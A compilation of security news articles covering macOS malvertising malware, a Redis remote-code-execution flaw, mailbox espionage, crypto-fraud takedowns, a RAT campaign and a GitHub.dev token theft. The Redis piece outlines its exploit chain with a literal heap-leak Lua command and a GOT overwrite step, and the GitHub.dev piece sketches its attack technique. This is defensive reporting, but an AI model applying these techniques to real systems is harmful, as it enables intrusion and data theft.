Once we had the process hashes and file paths from EDR, we searched across the full customer environment for other hosts exhibiting the same behavior. This turned a single finding into a scoped understanding of how far the compromise had spread.

How AI and human analysts divide the work 

Talos Threat Hunting runs on a hybrid model where each component does what it's best at. 

The AI engine handles volume and persistence. It executes hundreds of hunt hypotheses continuously across all customer environments. It applies statistical models (DGA detection, behavioral baselining, anomaly scoring) to telemetry streams at a scale no analyst team could match. Its job is to reduce the search space by taking the full volume of telemetry and surfacing the subset that warrants human attention. 

Human analysts handle context and judgment. A statistical anomaly is not the same as a confirmed threat. Analysts validate findings by correlating across data sources, applying knowledge of the customer's environment, and making determinations that require understanding adversary intent. When an analyst confirms a finding, the customer receives a written notification explaining what was observed, why it matters, how it maps to known techniques (MITRE ATT&CK or equivalent), and specific remediation guidance. 

This is not "AI finds threats and humans approve them." The AI surfaces candidates from a space too large for humans to search manually. Humans then do investigative work that AI cannot always reliably perform: understanding whether a particular behavior is malicious or benign given the full operational context of that specific environment.

The feedback loop: Hunting improves detection 

Every confirmed finding is first reported to the customer, then evaluated for a second question: “Should this have been caught by automated detection?” 

If the answer is yes, that means a detection gap exists. Maybe a rule needs tuning, a sensor configuration needs adjustment, or the customer's policy allows something that creates unnecessary exposure. In each case, the finding feeds back into product improvement or customer-specific configuration recommendations.

This creates a cycle: Intelligence drives hypotheses, hypotheses drive hunts, hunts produce findings, findings improve detection, and better detection raises the bar for what qualifies as "between the alerts." The space we hunt in gets harder to exploit over time. 

What this means for your security team 

If you have a mature SOC, this covers the ground your team is not currently reaching. These hypotheses are built from global threat intelligence, executed continuously, across telemetry your analysts may not have time to proactively search. The findings are validated before they reach you, so they add signal without adding noise. 

If you are running a lean security operation, this provides a hunting capability that would otherwise require dedicated headcount, specialized tooling, and the institutional knowledge to know what "normal" looks like well enough to spot deviations. 

Either way, the output is not more alerts. It's written findings with context, mapped to adversary techniques, with clear next steps that you can act on directly. To learn more, contact your Cisco account team and explore what’s possible with Cisco Talos.  

Some products or features described may be in various stages of development and offered on a when-and-if available basis. Cisco reserves the right to change delivery timelines and will have no liability for any delays or failures to deliver.  

from Cisco Talos Blog https://ift.tt/XhyNnip
via IFTTT

FlutterShell Backdoor Spreads to macOS via Malicious Google and YouTube Ads

Cybersecurity researchers have shed light on a macOS malvertising campaign codenamed Operation FlutterBridge that spreads a new backdoor called FlutterShell.

According to Palo Alto Networks Unit 42, the campaign is said to be the next stage of a previously reported activity cluster dubbed JSCoreRunner (aka FileRipple) in late August 2025. The cybercrime group behind the two attack chains is being tracked under the moniker CL-CRI-1089. The attackers are assessed to be active since at least 2023.

"Built using the Flutter framework, FlutterShell infects targets with adware via malicious desktop applications," Unit 42 said. "In addition to its adware functionality, the payload possesses backdoor capabilities, including shell command execution and file system manipulation."

Operations attributed to CL-CRI-1089 also include Recipe Lister and Calendaromatic, both of which fall under a broader designation known as TamperedChef (aka EvilAI), an ongoing series of campaigns that involve using trojanized versions of productivity software to deliver potentially unwanted programs (PUPs) and adware.

These campaigns distribute malicious Google and YouTube advertisements using a network of Google-verified shell companies, with the ads acting as a lure to trick targets into deploying malware that masquerades as legitimate desktop applications. Some of the front companies are AdsParkPro LTD, Advantage Web Marketing LLC, and SOFT WE ART LIMITED (now PACIFIC TRADE SOLUTIONS LTD).

Target audiences for these ads are macOS users in the U.S., Canada, Australia, France, and Germany. Although none of the Google Ads accounts are currently accessible via the Google Ads Transparency Center, records from YouControl and the U.K. government's Companies House register indicate that the firms all have links to Ukrainian individuals.

The latest iteration entails the deployment of FlutterShell, which supports arbitrary command execution, file system interaction, and environment variables exfiltration. These efforts have been detected as recently as March 2026.

"Upon execution, the malware modifies Google Chrome configuration files to hijack the browser, forcing all traffic through an attacker-controlled, ad-filled intermediary site," researchers Ido Asher, Noa Dekel, and Tom Fakterman said. "All observed samples were signed with valid Apple Developer IDs and successfully passed notarization, meaning Apple's automated security checks did not flag them as malicious at the time of submission."

What makes FlutterShell noteworthy is that it implements a WebView-based architecture that utilizes a JavaScript-to-native bridge, thereby allowing the adversary to host malicious logic on an external website, rather than embedding it into the binary. This, in turn, makes it possible to dynamically alter the malware's behavior in real time without having to recompile or push out an updated version to compromised hosts.

"In WebView-based architecture, a native application uses an embedded web browser component to display content," Unit 42 explained. "The JavaScript-to-native bridge acts as a communication channel between this web content and the host native application, allowing them to exchange data and cross-invoke functionality."

Three different variants of FlutterShell, viz., PodcastsLounge, PDF-Brain, and PDF-Ninja, have been identified. This, coupled with the presence of unfinished functions in the JavaScript logic hosted on the attackers' infrastructure, suggests the malware is likely under active development.

Some of the variants, PDF-Brain and PDF-Ninja, feature an artificial intelligence (AI)-powered summarization capability by relaying documents through an attacker-controlled server before processing them. FlutterShell also enables system fingerprinting and the theft of browser session data.

FlutterShell has also been found to share technical similarities with Calendaromatic and Recipe Lister, the most obvious being the WebView-based code architecture to facilitate dynamic payload changes. What's more, Advantage Web Marketing LLC has been observed not only spreading malicious ads but also acting as the signatory for Windows adware variants associated with the cluster.

"The evolution from JSCoreRunner to FlutterShell represents a significant increase in technical depth for the attackers behind CL-CRI-1089," Unit 42 said. "Furthermore, the scale of the distribution network, coupled with the verified shell entities used to bypass ad-network vetting, highlights the persistent danger of malvertising. The coordination of multiple shell entities, and the rapid development and delivery of new FlutterShell variants, indicates that this campaign is far from over."

from The Hacker News https://ift.tt/IMQnCNH
via IFTTT

Autonomous AI Tool Finds 2-Year-Old RCE Flaw in Redis (CVE-2026-23479)

Redis has patched a use-after-free in its blocking-client code that lets an authenticated user run arbitrary OS commands on the machine hosting the database. The flaw was found by an autonomous AI tool built to hunt bugs in large codebases.

Tracked as CVE-2026-23479, the flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5 fixes, unnoticed for over two years. NVD rates it 8.8 under CVSS 3.1; Redis lists it as 7.7 under CVSS 4.0. It was reported by Team Xint Code, and a complete technical write-up is now public.

The cloud footprint makes this worse. Wiz's analysis, published with the exploit writeup, puts Redis in a large majority of cloud environments, with most of those instances running without a password. The exploit needs an authenticated session, but in a default deployment, the default user already holds every privilege the chain requires.

The flaw lives in unblockClientOnKey() in src/blocked.c, which fires when a key event wakes a blocked command. The function dispatches the queued command through processCommandAndResetClient(), then keeps using the same client pointer. The problem: that function can free the client as a side effect, and its own header comment says so. The caller ignores the return value and reads the freed structure anyway, a use-after-free (CWE-416).

Per Wiz's analysis, the bug took two commits to create. A January 2023 refactor (PR #11012) added the unchecked call. A March 2023 change (PR #11568) added more client access after it. Neither was dangerous alone. Together, they reached general availability in 7.2.0 and survived multiple rounds of security review.

The chain starts by leaking a heap address. From there it frees a client and slips a fake one into the same memory, then turns Redis's own memory accounting against itself to overwrite a function pointer.

The published version runs in three stages.

• First, a one-line Lua script (EVAL "return tostring(redis.call)" 0) leaks a heap pointer.
• Second, the attacker grooms client memory limits, parks a bloated client on a stream, then drops the limits and wakes it. Redis frees the blocked client mid-call, and a pipelined SET immediately reclaims the freed slot with a fake client structure.
• Third, Redis's routine memory accounting in updateClientMemoryUsage() performs an out-of-bounds decrement using attacker-controlled fields, aimed at the Global Offset Table to repoint strcasecmp() at system(). The next command Redis parses runs as a shell command.

The official Redis Docker image makes the last step easier. It ships with only partial RELRO, leaving the GOT writable at runtime. ASLR and PIE do not help here, since the write is relative to a global whose offset is fixed at build time.

The full chain needs an authenticated session with CONFIG SET, EVAL, stream commands (XREAD/XADD), and basic SET/GET, which maps to the @admin, @scripting, @stream, and @read/@write ACL categories.

The default user has all of them, and in most deployments, these privileges are grouped into a single shared application or operator role. Denying CONFIG outright breaks this specific chain, though not the underlying use-after-free.

Team Xint Code demonstrated the working RCE at ZeroDay.Cloud 2025, Wiz's hacking competition in London last December. Theori describes Xint Code as an autonomous AI security tool built to hunt bugs in large codebases.

Redis said it had no evidence of exploitation in its own or customer environments, and as of publication no public in-the-wild reports have surfaced. The full technical chain is now public, increasing the risk of follow-on exploitation.

Upgrade to the patched minor for your series: 7.2.14, 7.4.9, 8.2.6, 8.4.3, or 8.6.3, all released on May 5. Minor upgrades within a series are meant to be drop-in. Managed Redis services patch on their own schedules, and Redis says Redis Cloud is already done.

Branch	Affected	Fixed
7.2.x	7.2.0 to 7.2.13	7.2.14
7.4.x	7.4.0 to 7.4.8	7.4.9
8.2.x	8.2.0 to 8.2.5	8.2.6
8.4.x	8.4.0 to 8.4.2	8.4.3
8.6.x	8.6.0 to 8.6.2	8.6.3

If you cannot patch yet: keep Redis off the public internet and behind TLS, tighten ACLs so no single role holds @admin, CONFIG, and @scripting together, and deny @scripting if you do not use Lua, which kills the Stage 1 leak.

Prioritize internet-exposed instances, shared application credentials, and any role that combines CONFIG, scripting, and stream access. Rotate any broadly shared Redis credentials while you are at it.

CVE-2026-23479 was one of five RCE-class Redis flaws disclosed last month, and it follows Redis's 2025 RediShell flaw, another authenticated use-after-free involving Lua scripting. It is also the one an AI tool caught. Two commits planted it, two years hid it, and it sat in one of the most-deployed databases around until a hacking contest surfaced it. Code review never did.

from The Hacker News https://ift.tt/Vu8MnJj
via IFTTT

Hackers Spied on a Stock Exchange Executive's Outlook Mailbox for Five Months

Unknown attackers spent at least five months inside the Outlook mailbox of a senior executive at a major global stock exchange, copying the inbox out in small, repeated batches and routing it through Dropbox and OneDrive so the traffic blended into normal cloud activity.

Symantec and Carbon Black's Threat Hunter Team reported the campaign this week. This points to espionage, not a money grab: Symantec said the commands indicate intelligence collection, not theft for profit.

Neither the executive nor the exchange was named. The value is plain enough: an exchange executive's inbox can hold non-public listing details, enforcement matters, deal terms, market-moving plans, plus the executive's calendar and contacts.

Five months of quiet access handed the attacker a detailed read on the executive's dealings and where the organization was heading, without needing broad access to other business systems.

The first malicious activity showed up on October 10, 2025. By then, the attacker was already running two binaries as SYSTEM, the highest Windows privilege level, one faking Adobe's updater and the other faking OneDrive. By the time defenders noticed anything, the intruder had full control of the machine, and how they first got in is still unknown.

However, Symantec confirmed that the first signs likely came from lateral movement off a previously compromised device. The operation kicked into gear on November 12. The attacker pulled a Dropbox API token, started uploading data with curl, and deployed the main tool: a mailbox stealer built on Aspose, a legitimate .NET library that reads Outlook OST and PST files. Wrapped in an executable, it converted the mailbox to PST and wrote it to disk, run each time with a password and a date-range flag.

The first run grabbed everything from August 2025 on. After that the attacker came back every two to four weeks, each run taking only the days since the last one, eight more pulls through February 17, 2026. The result is a near-continuous copy of the mailbox, sliced thin enough not to draw attention from security software.

The stealth came from making the work look ordinary. Scheduled tasks posed as Adobe, Lenovo and OneDrive system services. For exfiltration the attacker used Dropbox and OneDrive Personal, and for OneDrive they connected to hard-coded Microsoft IP addresses instead of the onedrive.live.com hostname, so there were no DNS lookups for a perimeter tool to catch or block.

The attacker also tested the public file host temp.sh once in November, then dropped it. The last observed activity, on March 19, 2026, was a new backdoor that was staged but never run, which Elias said may mean the attacker lost access soon after.

Symantec's published indicators point to a wider intrusion kit, not just a mailbox grabber: FRPC for tunneling traffic out, Secretsdump for pulling Windows credentials, SharpDecryptPwd for recovering saved app passwords, and a tool to bypass Windows User Account Control. The report does not say how each was used here, and none of them point to a specific group.

There is no CVE in this story. It was an intrusion against a person's mailbox, not the exploitation of a freshly disclosed flaw, which is part of why it is worth reading: no patch closes this, and the burden shifts to monitoring and response.

Attribution is unresolved too. The mix of public tooling and consumer cloud services left little to tie the activity to a known actor, and that stays open until a stronger source says otherwise. Routing exfiltration through Dropbox and OneDrive to blend in is a well-worn play, and one Microsoft has flagged as a deliberate way to slip past perimeter defenses and muddy attribution.

If you defend an exchange, a regulator, or any firm sitting on market-moving information, feed the hashes in now and watch for the behavior behind them: unusual mailbox export activity, odd Outlook access, uploads to personal Dropbox or OneDrive accounts, unexpected tunneling, and credential-dumping on systems tied to privileged users.

from The Hacker News https://ift.tt/1ZXAMoR
via IFTTT

DoJ Disrupts Southeast Asia Crypto Fraud Networks, Freezes $3.8 Million in Assets

The U.S. Department of Justice (DoJ) on Wednesday announced the results of a sweeping action undertaken by government authorities and private sector companies to combat cyber-enabled and cryptocurrency fraud targeting Americans.

The "Disruption Week" operation began May 18, 2026, leading to the takedown of millions of social media, email, and internet access accounts used by transnational cybercrime groups in Southeast Asia to defraud victims. Private sector entities voluntarily froze over $3.8 million in cryptocurrency involved in the laundering of funds stolen from Americans.

"Cyber-enabled and crypto investment fraud is devastating Main Street Americans, wiping out life savings and preying on some of our most vulnerable citizens," said U.S. Attorney Jeanine Ferris Pirro for the District of Columbia.

The efforts are part of an ongoing U.S. government initiative called Scam Center Strike Force, which aims to dismantle transnational criminal organizations running cyber-enabled fraud and "pig butchering" (aka romance baiting) scams from compounds in Southeast Asia, along with the human trafficking and money laundering operations that fuel the illicit enterprise.

These schemes typically involve cultivating relationships with prospective victims over time before they are coaxed into depositing funds into fraudulent investment platforms under the promise of high returns. Once the assets are deposited, they are routed to accounts under the scammers' control. Once the victim runs out of money or discovers the fraud, the criminals cease contact with them.

Participating in the operation were Apple, Coinbase, Google, Meta, Microsoft, Silent Push, SpaceX/Starlink, TRM Labs, and Zenlayer, alongside the Australian Federal Police, Canadian Anti-Fraud Centre, New Zealand Police, the Royal Thai Police, and U.K. National Crime Agency.

The "first-of-its-kind event" has resulted in a series of actions -

• Disruptions of criminal activity across more than 1.4 million accounts, pages and groups across Facebook and Instagram, 20,000 Microsoft accounts, and thousands of Starlink kits;
• Interruptions of malicious IP address traffic and of network connections hosted by scammers;
• Decommissioning of servers, colocation environments, and hosting infrastructure linked to scam networks operating across Southeast Asia;
• Identification of multiple scammers and scam platforms, and referrals of the same to U.S. authorities for investigation and possible prosecution; and
• Arrests of seven scammers in Thailand and the opening of new cases by the Royal Thai Police Anti-Cyber Scam Center.

According to the DoJ, cryptocurrency investment scams have emerged as one of the "fastest growing and most financially devastating forms of fraud" targeting Americans, with reported losses from these scams rising from $3.96 billion in 2023 to $5.8 billion in 2024 and to more than $7.2 billion in 2025, registering a 24% increase year-over-year.

"Many of these schemes are run out of industrial-scale compounds in Cambodia, Laos, and in Burma along the border with Thailand," the DoJ said. "Criminal syndicates often lure workers to Thailand with promises of high-paying technical jobs, then seize their identification documents and traffic them to work in scam compounds."

"Within the compounds, trafficked workers are frequently forced to conduct fraud operations against victims in the United States and elsewhere under threat of violence."

Last month, a joint international operation involving U.S. and Chinese authorities arrested at least 276 suspects and shut down nine scam centers used for cryptocurrency investment fraud schemes targeting Americans.

In a coordinated statement, Meta said law enforcement has arrested 63 potential criminals connected to scam centers thus far, with Coinbase freezing over $3 million in cryptocurrency assets tied to criminal networks.

"Transnational online fraud cannot be solved by any single agency or country acting alone, which is why strong collaboration and timely information sharing remain essential to dismantling these networks and protecting the public," Police Lieutenant General Jirabhop Bhuridej, Royal Thai Police, said.

from The Hacker News https://ift.tt/32uGIHx
via IFTTT

Google DoubleClick Abused in New Malspam Campaign to Deliver DesckVB RAT

Cybersecurity researchers have flagged a new malspam campaign that makes use of Google's DoubleClick domain as a way to evade detection and ultimately deliver a remote access trojan (RAT) named DesckVB RAT.

"Before the victim ever reaches attacker-controlled infrastructure, the lure routes through DoubleClick, a legitimate Google-owned domain that many security tools are less likely to treat as suspicious," Huntress researchers Anna Pham and Adam Mooney said in a report shared with The Hacker News.

"From there, the victim is passed into a malspam kit that personalizes itself on the fly using the victim's email address, dynamically pulling in company branding and location details to make the page feel convincing without requiring the operators to handcraft a lure for each target."

What makes this attack noteworthy is that it eliminates the need for having a bespoke kit for each targeted organization, thereby making these operations more scalable and cost-effective. The end goal of the campaign is to drop DesckVB RAT, a .NET-based trojan that has been active in the wild since February 2026.

The attack begins when an unsuspecting user opens an HTML file that's attached to a phishing email. The file triggers a meta-refresh browser redirect to a Google DoubleClick Campaign Manager click-tracking URL, from where the user is steered to another redirector, which decodes the Base64-encoded email address and leads the victim to a landing page containing a "Download PDF" button.

Clicking the button causes the server to respond with a ZIP archive that initiates the rest of the infection chain. This is achieved by means of a JavaScript loader, whose main responsibility is to retrieve and execute a .NET RAT while flying under the radar. The script extracts and runs a PowerShell script, which then fetches a .NET loader from an external server.

The loader acts as a stager that verifies it's not being analyzed, neutralizes the machine's security controls, sets up persistence, and then ultimately downloads and runs the RAT payload by using a technique called process hollowing that involves injecting the malware into Microsoft-signed processes.

Once launched, the trojan communicates with a command-and-control (C2) server over raw TCP sockets, carries out system reconnaissance, and configures Microsoft Defender exclusions. The trojan also patches Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) at the native API level at the outset in an effort to blind Windows telemetry before persistence is established on the host by setting up Run and RunOnce Registry entries, along with placing a loader responsible for launching the RAT in the user's Startup folder.

The malware comes with capabilities to extract data, run commands, and deploy additional payloads, granting the attackers full control over the infected machines, while simultaneously taking steps to fly under the radar by terminating and rebooting the machine if it detects an analysis tool or determines that it's running in a sandboxed environment.

"This is a strong reminder of why defence in depth matters," Huntress said. "Configuring a Group Policy Object (GPO) in Active Directory to force script files such as .vbs, .hta, and .js to open in Notepad by default can stop a threat actor at the very first stage, preventing additional payloads from ever being dropped."

"On the email security front, organizations should consider deploying DMARC, DKIM, and SPF records to reduce the likelihood of spoofed or malicious emails reaching end users. Beyond that, an email gateway solution capable of sandboxing attachments and links before delivery adds another meaningful layer of protection."

from The Hacker News https://ift.tt/278XJcY
via IFTTT

One-Click GitHub Dev Attack Lets Attackers Steal Full GitHub OAuth Tokens

Cybersecurity researchers have disclosed a one-click attack via Microsoft Visual Studio Code (VS Code) that makes it possible to steal a user's GitHub token.

"Just by clicking a link, it's possible for an attacker to steal a GitHub token that can read and write to your repos, including private ones," security researcher Ammar Askar said.

GitHub supports a feature called GitHub.dev that runs as a lightweight web-based source code editor in the web browser's sandbox by launching a VS Code environment. It allows users to send pull requests and make commits.

"This functionality is achieved by github.com POSTing over an OAuth token to github.dev that allows it to interact with GitHub on your behalf," Askar said. "The token is not scoped to the particular repo you interacted with, meaning it has full access to every other repo that you have access to."

In a nutshell, the vulnerability allows attackers to install malicious VS Code extensions that steal GitHub OAuth tokens when they are passed to GitHub.dev by exploiting a message-passing mechanism between the main VS Code window and webviews. Webviews are used to render Markdown previews or edit Jupyter notebooks.

Specifically, the exploit runs malicious JavaScript inside an untrusted webview to simulate keypresses (aka keydown events) in the main editor window, open the Command Palette by triggering "Ctrl+Shift+P," and install an attacker-controlled extension that extracts the GitHub OAuth token sent to GitHub.dev and queries the GitHub API to enumerate all private repositories the victim can access.

It's worth noting the approach also leverages a VS Code feature called local workspace extensions that allows an extension to be directly installed without presenting any additional trust dialog prompt as long as it's placed in the ".vscode/extensions" folder within that workspace, effectively bypassing the publisher trust check.

"This is just a small hiccup though, one of the things that extensions can do as part of their package.json is to contribute extra keybindings to VS Code," the researcher explained. "Since we can reliably trigger keybindings, we can just add a keybind for whatever VS Code command we want, such as installing an extension while skipping the trusted publisher check."

The researcher also noted GitHub was notified of the vulnerability on June 2, 2026, an hour after which details of the issue were made public knowledge, citing Microsoft's handling of VS Code-related bugs in the past. As of writing, Microsoft has acknowledged the vulnerability and noted that it's working on a fix.

"To clarify, this issue does not affect VS Code Desktop," Alexandru Dima, a partner software engineering manager at Microsoft, said.

from The Hacker News https://ift.tt/jL6rAFp
via IFTTT

Beyond the Zero-Day: See Your Network Like an Attacker | Webinar with HD Moore

Assume the breach. Zero-days keep shipping, AI is writing exploits faster than anyone patches, and "patch everything in time" stopped working years ago. Stop betting the org on winning that race. You don't control which bug lands. You control what it can reach once it does.

That is a question about the shape of your network, and most teams have the shape wrong. HD Moore, creator of Metasploit and now CEO of runZero, spends the session showing you that shape from the attacker's side.

Save your seat for a LIVE session, or register, and we will send you the recording.

The segmentation you think you have

The comfortable assumption: critical systems sit behind a firewall or off on their own segment, so a foothold over here cannot become a disaster over there. Call it the segmentation illusion. It holds until someone maps the network for real.

Then the seams show up. A device wired into two networks at once, quietly bridging the zones you meant to keep apart. Connected gear nobody registered, answering on a segment it should not be on. Whole sets of machines hiding behind an industrial protocol gateway, invisible to your scanner, reachable by anyone who knows the gateway is there. None of it is on the asset list. All of it routes around the control you were counting on.

Inventory is a list. Attackers read a map.

You keep an inventory, a static list of things you own. An attacker does not care about your list. They care about paths: how one foothold reaches the next, until it lands on something that hurts. The two views rarely match, and the difference is exactly the part of your network you cannot see and they can. Moore built Metasploit, the framework half the industry learned offense on, and now runs the company whose whole job is finding the assets and connections organizations don't know they have.

Grab your spot and see that view turned on your own environment.

What you leave able to do

• Find the assets you don't know you have. Unsanctioned IT, shadow IoT, and the sub-assets behind OT protocol gateways where your scans never look.
• Find the bridges that break segmentation. The multi-homed devices and forgotten assets connecting zones you believed were isolated.
• See the paths, not just the parts. Trade static inventory for live attack-path mapping that shows how a foothold actually travels.
• Fix the few things that matter. Focus remediation on the assets and links that shorten an attacker's route to impact.

Corporate network, factory floor, or both tangled together: if IT, IoT, and OT share your environment, the seams between them are where this goes wrong. See your network the way an attacker already does, before they do.

Register now. Can't make it live? Sign up anyway, and we will send the recording.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.

from The Hacker News https://ift.tt/MsQ5lhu
via IFTTT